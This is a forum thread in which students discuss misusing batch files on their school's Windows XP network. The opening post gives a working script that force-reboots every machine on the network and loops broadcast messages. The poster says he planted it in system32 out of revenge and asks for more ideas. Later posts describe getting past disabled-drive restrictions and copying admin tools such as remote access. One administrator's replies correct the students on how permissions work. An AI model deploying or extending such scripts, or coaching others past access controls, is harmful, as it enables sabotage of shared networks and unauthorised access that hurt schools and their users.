you and your dos commands

[Phiredude]

hey, so i go to a public school and they can piss you off pretty fast. well, the way i see it, the idiots are running windows xp and the whole school is on a network. so i mosy on into the library and type up a nifty little batch file laced with a little visual basic. i set it into system32 and watch the idiots screw themselves over. here are the dos commands i used

 

@echo off
:1
shutdown -r -f -m \\* -c "whatever"
:2
net send * windows would like to take a nap now!!!
net send * Goodbye!!!
goto 2

 

 

 

if any of you nice people have done something like this at work or school or would like to give me some ideas on what to stick in it, it would be awesome. and yall probably don't approve of this, but you see, i showed the head admin lady a whole bunch of flaws in their security and got 10 days OCS. thats why i am doing this.

[Jordie]

hey' date=' so i go to a public school and they can piss you off pretty fast. well, the way i see it, the idiots are running windows xp and the whole school is on a network. so i mosy on into the library and type up a nifty little batch file laced with a little visual basic. i set it into system32 and watch the idiots screw themselves over. here are the dos commands i used

 

@echo off
:1
shutdown -r -f -m \\* -c "whatever"
:2
net send * windows would like to take a nap now!!!
net send * Goodbye!!!
goto 2

 

 

 

if any of you nice people have done something like this at work or school or would like to give me some ideas on what to stick in it, it would be awesome. and yall probably don't approve of this, but you see, i showed the head admin lady a whole bunch of flaws in their security and got 10 days OCS. thats why i am doing this.[/quote']

 

This is childish stuff. The only time I did something of the sort was when I tried to tell my school about several things they need to take care of with there security, they dismissed me. I though it would scare them if I did net send * Your security sucks. Fix it. and it did scare them.

 

Also these commands won't work if several services have been disabled either on your machine or the machine your trying to send it to.

[5614]

ive never tried writing a bat file for the net send command in this school, however this security is good (you can breach it, but you will be caught). so i've never tried it. although ive tried writing bat files to read and copy stuff off a floppy disk, but am having difficulties (command prompt and floppy drives have both been disabled) however the bat file can still exectue assumig i have 'pause' command at the end of the file. but when i do it becomes really weird and tries opening a:\\\par (which dont exist) and it only told it to

a:\

copy *.* S:\

btw, S:\ is the network drive, however i only have a certain cached area of it, so im not sure its precise directory (and no you can just look at the address bar because when you log on, it shows you me as:

5614cached$ on 'Cl2ksrv01' (S:)

but that is not a true directory which i can type in CMD (command prompt)

anyway, im working on it, only started trying it yesterday!

[5614]

"and tries opening a:\\\par" -- 5614

 

yeah, that happened because i was using wordpad to make the bat file!! oops. i did it because we dont have notepad. wordpad (or just MS word) put a whole load of coding crap before all the text, hence it buggered up the bat file.

simply making a file, renaming it *.txt deleting coding and saving as *.bat works fine.

 

with bat files and DOS which i can access other ways too i can openly view the whole network without security issues. i can easily copy over admin files allowing me to access the schools mainframe etc.

 

at the same time i dare do more than dir the folders where these files are due to the high security in my school and the fact that i have already been caught doing something similar!

 

as it is my friend set off a net send command... he didnt believe me it would work!!! that was startling when he read the message had been sent to the whole school domain!!!!!

[mossoi]

with bat files and DOS which i can access other ways too i can openly view the whole network without security issues. i can easily copy over admin files allowing me to access the schools mainframe etc.

If this is the case then your school network is very far from secure. When you execute a batch file from Windows you inherit the same access rights as your AD/NT login. The batch file is not bypassing any security, the security's just not there in the first place. You could go to the location through Windows just as easily.

 

Your S: drive will be a shared folder on the file server and could be anywhere within the directory tree. If the school has any sense it would be a $ share so that even if you could browse a higher directory within the tree you still wouldn't be able to see it.

[5614]

The batch file is not bypassing any security, the security's just not there in the first place. You could go to the location through Windows just as easily.

no you cant go though windows, thats the thing! the school has advance windows security, but NO DOS security. hence bat files are free to roam the network, whereas windows has restirctions at every corner.

 

Your S: drive will be a shared folder on the file server and could be anywhere within the directory tree.

S: is not a shared folder on the file server. it is a HDD in its own right. its just a massive HDD which has been partioned loads of times. each user account has rights to 100MB of it. hence every user has there own HD space and doesnt have rights to any of the other 'sections' of it. using this method i can access my part of it and no one else's as it is with every student/teacher in the school.

 

it would be a $ share so that even if you could browse a higher directory within the tree you still wouldn't be able to see it.

yub yub. i cant see higher in the S: directories, however i can view other drives such as C: where all the programs (such as admin control programs) have been installed to, using a copy command i can copy a shortcut to the program over to my account and give myself admin programs (such as remote access), whilst i wont have admin rights, theres no security stopping me from using a program.

[mossoi]

no you cant go though windows, thats the thing! the school has advance windows security, but NO DOS security. hence bat files are free to roam the network, whereas windows has restirctions at every corner.

You're not quite understanding how permissions work when it comes to DOS and Windows (and if your using CMD then it's not DOS it's the Windows Command Prompt which is a DOS emulator unless you are specifically booting into DOS from another source). Domain permissions are either set through NT Security or Active Directory users and computers depending on how the network Forest has been set up. The command prompt is merely an application the runs under your login credentials, unless you shift, right click the CMD shortcut, select runs as and login with another user then it's exactly the same as using Windows Explorer under your own login when it comes to files that you can and can't see.

S: is not a shared folder on the file server. it is a HDD in its own right. its just a massive HDD which has been partioned loads of times. each user account has rights to 100MB of it. hence every user has there own HD space and doesnt have rights to any of the other 'sections' of it. using this method i can access my part of it and no one else's as it is with every student/teacher in the school.

Again, you're kinda misunderstanding - it doesn't matter how many hard drives are on the server it still has a directory structure, one folder of which is shared as your S drive (if the drive is huge then it's likely to be a RAID array which can be made up of many drives). It seems odd that the school would choose to go the route of partitioning a drive many times just to set up shared areas, this is wasterful and un-scaleable. Even if your data was on a specific partition it's still within the directory structure of the server and still needs to be shared out as a folder.

 

I'm an admin on a very large network (more than 40,000 users and 1000+ servers) that utilises many different types of shared area, application dispenser, personal data, department data, etc... all of which are mapped as specific drives for each user. It's Microsoft's standardised way of permissioning a network and allows granularity when setting specific perms. and is by far the most efficient way to do things based on expanding the network when new users join and making the best use of the resources.

[5614]

firstly im ok at getting around security, but im not whiz at understanding it. i can set it up but have never done large network security so i dont mind it when you tell me im wrong!!!! (in this case!)

The command prompt is merely an application the runs under your login credentials

except that (for example) the school has de-activated all floppy drives. if you try and load it through IE (by typing A: or A:\ in the address bar) it wont work. if you try and load it through dos, it wont work. BUT if you try and access it through a bat file it works fine.

if a teacher logs onto the same computer as me they can access the A: drive. clearly the student accounts do not have access to the A: drive, but using CMD which as your rightly say is a DOS emulator as it is not an OS in its own right as im running windows as the OS (where was i? yeah CMD) by-passes the A: access rights and allows me to access the A: drive.

similarly the same thing happens with C: where all programs (from word to remote access) are all installed.

 

Again, you're kinda misunderstanding - it doesn't matter how many hard drives are on the server it still has a directory structure, one folders of which is shared as your S drive. It seems odd that the school would choose to go the route of partitioning a drive many times just to set up shared areas, this is wasterful and un-scaleable. Even if your data was on a specific partition it's still withing the directory structure of the server and still needs to be shared out as a folder.

ok, i dont know if they partioned the S: drive. what i do know is that S: is an actual HDD which is located in the file server. every user account has access to a different part of it.

even using DOS i could not (for example) access my friend's account's documents, or at least i cant do it by dir-ing and cd-ing the S: drive.

[mossoi]

even using DOS i could not (for example) access my friend's account's documents, or at least i cant do it by dir-ing and cd-ing the S: drive.

Correct because your S drive takes you into the folder structure as though your partition is the root so you can't see above or parallel to that folder. If type the server's UNC path in Explorer or IE you will most likely see its non-hidden shares. If your school admin is any good you won't be able to see you friends share because it will be a $ share and as such invisible when browsed (in CMD or Windows). Command doesn't do anything that Windows can't do anymore (since Win 2000) so you are going to hit the same domain permissions barriers using batch files as you would using Explorer to its full extent. There's a lot more to browsing a network from Windows than double clicking on network PC and shares.

[5614]

If your school admin is any good you won't be able to see you friends share because it will be a $ share and as such invisible when browsed (in CMD or Windows).

yes, that is correct, it is a $ hence in post 3 (which i posted last month) it says: "5614cached$ on 'Cl2ksrv01' (S:)" note the $

 

If type the server's UNC path in Explorer or IE you will most likely see its non-hidden shares

i know that! but if you go to the same address in CMD or a bat file then it DOES appear, even if it is hidden.

 

Command doesn't do anything that Windows can't do... hit the same domain permissions barriers using batch files as you would using Explorer to its full extent

but as with accessing C: and A: drives and many other functions too, CMD allows to access things which in windows i cannot. hence, to me it seems that bat files and CMD can by-pass security measures which are only too apparent in windows.

[mossoi]

the same domain permissions barriers

Not local permissions. It looks as though the A: and C: have been turned off through Windows controls rather than permissions. This is sensible really because you wouldn't be able to run any applications if you didn't have access to the C: drive.

[5614]

A: and C: have been turned off through Windows controls rather than permissions

thats what i thought. originally i could still access A: and C: drive by going into word and opening the file from there. then they stopped that so i would use 'open as copy'. now i cant even do that. when i try to access A: it says that access rights to the A: have been disallowed. i cannot even view the content of the floppy (through word) - i never could through IE or my computer.

 

however all this time CMD still works - as far as i can tell, CMD does do things which windows cannot.